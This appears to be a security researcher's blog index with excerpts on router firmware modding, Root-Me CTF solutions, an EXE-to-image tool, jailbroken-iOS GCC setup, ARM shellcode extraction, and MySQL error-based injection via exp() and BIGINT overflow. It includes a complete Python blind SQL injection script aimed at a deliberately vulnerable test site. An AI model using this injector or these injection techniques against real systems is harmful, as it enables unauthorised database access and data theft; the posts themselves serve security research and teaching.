How to Turn Your Switch into a Snitch

Warning: The author takes no responsibility for any damage you may cause to your device. This post is meant for educational purposes and strictly NOT for malicious purposes.

This post is all about modifying your existing router firmware to perform cool things.

Hardware and Tools Needed:

For the router, I am using a TP-Link MR3020. You may use whatever router you like but make sure you won’t brick your device after or while uploading the modified firmware. Also make sure your firmware can be reversed and dumped using the FMK (Firmware Mod Kit).

Download Firmware Mod Kit
(more…)

Solving Root-Me XORed Picture Challenge

Here‘s a cool challenge by Ryscrow of Root-Me . The challenge says

For this challenge you will need to decypher a simple XORed picture. This BMP picture was mistakenly encrypted. Can you recover it ?

The file name is “ch3.bmp” and let’s open in a hex editor and see. I first inspected the first 20 bytes and we can see a string saying “fallen”. Actually I guessed this key of length 6.

View post on imgur.com


(more…)

Exe2Image

This is A simple utility to convert EXE files to PNG images and vice versa. This is written using Java 8. Inspired by this article.

View post on imgur.com

Putty.exe converted to an image using green pixels.

View post on imgur.com

Download:
https://github.com/OsandaMalith/Exe2Image/releases

This tool was added to PentestBox : https://modules.pentestbox.com/#forensics

Softpedia:
http://www.softpedia.com/get/Security/Encrypting/EXE-to-Image-Converter.shtml

Other Shares:
http://www.kitploit.com/2017/09/exe2image-simple-utility-to-convert-exe.html

Automated Blind SQL Injector

There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.

This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py

import urllib2
import re

# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/

url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
    for j in range(32, 127):
        if(chr(j).isupper()):
            continue
        sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
        target = url + sql
        req = urllib2.Request(target)
        # If cookies exists
        # req.add_header('Cookie','value=1;value=2')
        page = urllib2.urlopen(req)
        html = page.read()

        try:
            re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
            print ('Found: ' + chr(j))
            result += chr(j)
        except:
            pass

print (result)

(more…)

Error Based SQL Injection Using EXP

Overview

This is another overflow in the DOUBLE data type in MySQL I found. You can refer to my previous post on BIGINT Overflow Error based injections if you want to understand exploiting overflows in extracting data. Also the queries are similar to my previous post. When we take the functions in MySQL I was interested in the mathematical functions. They too should contain some data type to hold values. So I went on testing for functions which would cause any overflow errors and I found out that exp() would cause a overflow error when we pass a large value above 709.

mysql> select exp(709);

+-----------------------+

| exp(709)              |

+-----------------------+

| 8.218407461554972e307 |

+-----------------------+

1 row in set (0.00 sec)



mysql> select exp(710);

ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

The exp is the opposite of the ln and log functions of MySQL. If I briefly explain the functionality of these, log and ln and both returns the answer to the natural logarithm or to the base e. In common e is approximated to: $latex e \approx 2.71828183&bg=FFFFFF&s=1$ .

$latex ln(15) = log_ {e} (15) = 2.70805020110221 &bg=FFFFFF&s=1$
(more…)

Installing GCC on iOS 8

I recently entered the world of mobile security and pen-testing. I wanted to install GCC in a jailbroken iOS 8.3 and had to face lots of issues in finding the correct package for it. So I somehow managed to install and run my own C apps 🙂 I thought of sharing this with you, if you are too struggling like me here’s how I managed to install this.

First install OpenSSH and essential bash commands like apt-get, sed, ps, etc. After that you have to install few debian packages along with gcc. Download this zip file I made and drop it into any folder in your iPhone using a SFTP connection or a desktop file browser. After that install all the packages in it.

[code language=”bash”]
$ dpkg -i *.deb
[/code]
(more…)

BIGINT Overflow Error Based SQL Injection

Overview

I was interested in finding out new techniques that we can use in extracting data via MySQL errors. This is a detailed write-up which will make you understand how I made these queries. When we look how MySQL handles integers I was interested in causing overflows. This is how MySQL stores integers.

View post on imgur.com


(Source: http://dev.mysql.com/doc/refman/5.5/en/integer-types.html)
These overflow errors will cause in MySQL versions 5.5.5 and above only. In below versions integer overflows would result in a silent wraparound.
The data type BIGINT is of 8 bytes in size which means it’s of 64 bits. If we take the maximum signed value of a BIGINT its “0b0111111111111111111111111111111111111111111111111111111111111111”, “0x7fffffffffffffff”, “9223372036854775807” in binary, hex and decimal respectively. Once we evaluate numerical expressions on this value like adding will cause a “BIGINT value is out of range” error. 

mysql> select 9223372036854775807+1; 

ERROR 1690 (22003): BIGINT value is out of range in '(9223372036854775807 + 1)'

(more…)

Getting Shellcode from ARM Binaries

For x86 and x86_64 there are already commands for extracting shellcode and printing them nicely formatted. But when it comes to ARM none of them work would because of the way objdump would dump the opcodes. For example if this is my sample program:

.section .text

.global _start



_start:



    .code 32

    # Thumb-Mode on

    add     r6, pc, #1

    bx  r6



    .code   16

    # _write()

    mov     r2, #7

    mov r1, pc

    add r1, #12

    mov     r0, $0x1

    mov     r7, $0x4

    svc     0



    # _exit()

    sub r0, r0, r0

    mov     r7, $0x1

    svc 0



.ascii "Osanda\n"

(more…)

Solving Root-me Ptrace challenge

You can find the challenge from here. The challenge is to find the password for the elf 32 binary. This is how this looks at a glance.

View post on imgur.com


Let’s fire up GDB and check this out. I’ll break main and run. We can see that arguments to ptrace() function is being pushed on the stack and ptrace is being called.

=> 0x080483fe <+14>:	sub    esp,0x14

   0x08048401 <+17>:	mov    DWORD PTR [ebp-0xc],0x80c2888

   0x08048408 <+24>:	push   0x0

   0x0804840a <+26>:	push   0x1

   0x0804840c <+28>:	push   0x0

   0x0804840e <+30>:	push   0x0

   0x08048410 <+32>:	call   0x8058a70 <ptrace>

(more…)